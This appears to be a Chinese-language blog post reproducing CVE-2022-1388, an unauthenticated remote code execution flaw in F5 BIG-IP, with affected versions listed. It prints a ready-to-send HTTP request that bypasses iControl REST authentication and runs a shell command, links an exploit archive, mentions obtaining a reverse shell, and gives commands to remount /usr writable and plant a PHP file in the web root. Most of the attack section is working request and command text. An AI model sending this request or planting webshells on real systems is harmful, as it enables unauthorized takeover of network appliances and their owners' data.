banner
毅种循环

毅种循环

头顶铁锅接收宇宙能量

CVE-2022-1388 F5 BIG-IP未授權RCE漏洞&寫Webshell

漏洞描述#

漏洞描述:
在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的
14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x 和 11.6.x 版本,未公開的請求可能會繞過
iControl REST 身份驗證。注意:未評估已達到技術支援終止 (EoTS) 的軟體版本.

複現過程#

HTTP 請求包如下:

POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}

image

EXP/POC#


CVE-2022-1388-EXP-main.zip

Webshell 寫入#

image
反彈獲得了 shell。

Webshell 的寫入可以參考另外一個漏洞 F5 BIG-IP CVE-2020-5902
寫入的路徑為:/usr/local/www

mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr

訪問路徑:
image

image

參考#



F5 BIG-IP 遠程代碼執行漏洞複現(CVE-2020-5902)

CVE-2020-5902 BIG-IP RCE 分析研究


載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。